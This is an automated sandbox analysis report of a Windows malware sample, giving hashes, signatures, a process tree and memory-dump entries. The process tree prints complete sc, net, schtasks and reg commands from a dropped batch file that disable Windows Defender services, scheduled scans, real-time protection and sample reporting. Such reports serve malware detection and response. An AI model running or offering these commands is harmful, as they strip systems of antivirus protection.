Analysis
-
max time kernel
34s -
max time network
47s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 22:22
Static task
static1
Behavioral task
behavioral1
Sample
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
Resource
win7-20220414-en
General
-
Target
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe
-
Size
269KB
-
MD5
6161cfa4c704ec1eff18ec8af42c72c7
-
SHA1
00bb164985ae6bfab56db839433618d505be5076
-
SHA256
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693
-
SHA512
8e4bef47649706800034e1275d5882124c8342b0a0fb418c2f5e8ef14a103e8a321a76dde8772eff5da1f2b27cae072f45ac88f79f4ec655cc3670c7b7c1b46f
Malware Config
Signatures
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.execmd.exenet.exenet.exenet.exenet.exedescription pid process target process PID 1960 wrote to memory of 1652 1960 15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe cmd.exe PID 1960 wrote to memory of 1652 1960 15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe cmd.exe PID 1960 wrote to memory of 1652 1960 15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe cmd.exe PID 1960 wrote to memory of 1652 1960 15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe cmd.exe PID 1652 wrote to memory of 1224 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1224 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1224 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1488 1652 cmd.exe net.exe PID 1652 wrote to memory of 1488 1652 cmd.exe net.exe PID 1652 wrote to memory of 1488 1652 cmd.exe net.exe PID 1488 wrote to memory of 1536 1488 net.exe net1.exe PID 1488 wrote to memory of 1536 1488 net.exe net1.exe PID 1488 wrote to memory of 1536 1488 net.exe net1.exe PID 1652 wrote to memory of 1572 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1572 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1572 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1524 1652 cmd.exe net.exe PID 1652 wrote to memory of 1524 1652 cmd.exe net.exe PID 1652 wrote to memory of 1524 1652 cmd.exe net.exe PID 1524 wrote to memory of 964 1524 net.exe net1.exe PID 1524 wrote to memory of 964 1524 net.exe net1.exe PID 1524 wrote to memory of 964 1524 net.exe net1.exe PID 1652 wrote to memory of 1320 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1320 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1320 1652 cmd.exe sc.exe PID 1652 wrote to memory of 240 1652 cmd.exe net.exe PID 1652 wrote to memory of 240 1652 cmd.exe net.exe PID 1652 wrote to memory of 240 1652 cmd.exe net.exe PID 240 wrote to memory of 1044 240 net.exe net1.exe PID 240 wrote to memory of 1044 240 net.exe net1.exe PID 240 wrote to memory of 1044 240 net.exe net1.exe PID 1652 wrote to memory of 300 1652 cmd.exe sc.exe PID 1652 wrote to memory of 300 1652 cmd.exe sc.exe PID 1652 wrote to memory of 300 1652 cmd.exe sc.exe PID 1652 wrote to memory of 1816 1652 cmd.exe net.exe PID 1652 wrote to memory of 1816 1652 cmd.exe net.exe PID 1652 wrote to memory of 1816 1652 cmd.exe net.exe PID 1816 wrote to memory of 1928 1816 net.exe net1.exe PID 1816 wrote to memory of 1928 1816 net.exe net1.exe PID 1816 wrote to memory of 1928 1816 net.exe net1.exe PID 1652 wrote to memory of 1700 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1700 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1700 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1204 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1204 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1204 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1060 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1060 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1060 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1656 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1656 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1656 1652 cmd.exe schtasks.exe PID 1652 wrote to memory of 1324 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1324 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1324 1652 cmd.exe reg.exe PID 1652 wrote to memory of 112 1652 cmd.exe reg.exe PID 1652 wrote to memory of 112 1652 cmd.exe reg.exe PID 1652 wrote to memory of 112 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1776 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1776 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1776 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1692 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1692 1652 cmd.exe reg.exe PID 1652 wrote to memory of 1692 1652 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\257C.tmp\257D.tmp\257E.bat C:\Users\Admin\AppData\Local\Temp\15d5c7d616c67d99cbd604cc6401fc2c60e51b29f227cf9c332201a510810693.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc config Sense start= disabled3⤵
-
C:\Windows\system32\net.exenet stop Sense3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Sense4⤵
-
C:\Windows\system32\sc.exesc config WdFilter start= disabled3⤵
-
C:\Windows\system32\net.exenet stop WdFilter3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WdFilter4⤵
-
C:\Windows\system32\sc.exesc config WdNisSvc start= disabled3⤵
-
C:\Windows\system32\net.exenet stop WdNisSvc Track3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WdNisSvc Track4⤵
-
C:\Windows\system32\sc.exesc config WinDefend start= disabled3⤵
-
C:\Windows\system32\net.exenet stop WinDefend3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableAntiSpywareRealtimeProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DpaDisabled" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ProductStatus" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "ManagedDefenderProductType" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "OneTimeSqmDataSent" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "AutomaticallyCleanAfterScan" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t REG_DWORD /d "8" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "AllowNonAdminFunctionality" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\system32\reg.exeReg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\257C.tmp\257D.tmp\257E.batFilesize
3KB
MD5810407dc9da6b1688b552d84e3ff11bf
SHA127166f30e433b396ad96f7bc5cadb95afde66e16
SHA2563cc739dcee739bbff3e609074d488fe108c58dcba7416a4a1941b79bf9d96aa2
SHA512f1d45b73cb7f2145ea50a9aa6aa0f3326d60ffb5d6f7d37b7cfb93864af379e81e5a977aa5c3080313837769eb6223b8efadb84a8d4f99517bf3fbf6e245fdaf
-
memory/112-74-0x0000000000000000-mapping.dmp
-
memory/240-64-0x0000000000000000-mapping.dmp
-
memory/284-81-0x0000000000000000-mapping.dmp
-
memory/292-95-0x0000000000000000-mapping.dmp
-
memory/300-66-0x0000000000000000-mapping.dmp
-
memory/308-97-0x0000000000000000-mapping.dmp
-
memory/732-78-0x0000000000000000-mapping.dmp
-
memory/816-84-0x0000000000000000-mapping.dmp
-
memory/964-62-0x0000000000000000-mapping.dmp
-
memory/996-89-0x0000000000000000-mapping.dmp
-
memory/1044-65-0x0000000000000000-mapping.dmp
-
memory/1060-71-0x0000000000000000-mapping.dmp
-
memory/1068-85-0x0000000000000000-mapping.dmp
-
memory/1100-90-0x0000000000000000-mapping.dmp
-
memory/1188-83-0x0000000000000000-mapping.dmp
-
memory/1204-70-0x0000000000000000-mapping.dmp
-
memory/1224-57-0x0000000000000000-mapping.dmp
-
memory/1296-77-0x0000000000000000-mapping.dmp
-
memory/1304-80-0x0000000000000000-mapping.dmp
-
memory/1320-63-0x0000000000000000-mapping.dmp
-
memory/1324-73-0x0000000000000000-mapping.dmp
-
memory/1344-79-0x0000000000000000-mapping.dmp
-
memory/1384-82-0x0000000000000000-mapping.dmp
-
memory/1452-92-0x0000000000000000-mapping.dmp
-
memory/1456-94-0x0000000000000000-mapping.dmp
-
memory/1464-87-0x0000000000000000-mapping.dmp
-
memory/1488-58-0x0000000000000000-mapping.dmp
-
memory/1524-61-0x0000000000000000-mapping.dmp
-
memory/1536-59-0x0000000000000000-mapping.dmp
-
memory/1572-60-0x0000000000000000-mapping.dmp
-
memory/1648-91-0x0000000000000000-mapping.dmp
-
memory/1652-55-0x0000000000000000-mapping.dmp
-
memory/1656-72-0x0000000000000000-mapping.dmp
-
memory/1692-76-0x0000000000000000-mapping.dmp
-
memory/1700-69-0x0000000000000000-mapping.dmp
-
memory/1764-93-0x0000000000000000-mapping.dmp
-
memory/1776-75-0x0000000000000000-mapping.dmp
-
memory/1816-67-0x0000000000000000-mapping.dmp
-
memory/1820-88-0x0000000000000000-mapping.dmp
-
memory/1928-68-0x0000000000000000-mapping.dmp
-
memory/1960-54-0x00000000759F1000-0x00000000759F3000-memory.dmpFilesize
8KB
-
memory/1992-96-0x0000000000000000-mapping.dmp
-
memory/2008-86-0x0000000000000000-mapping.dmp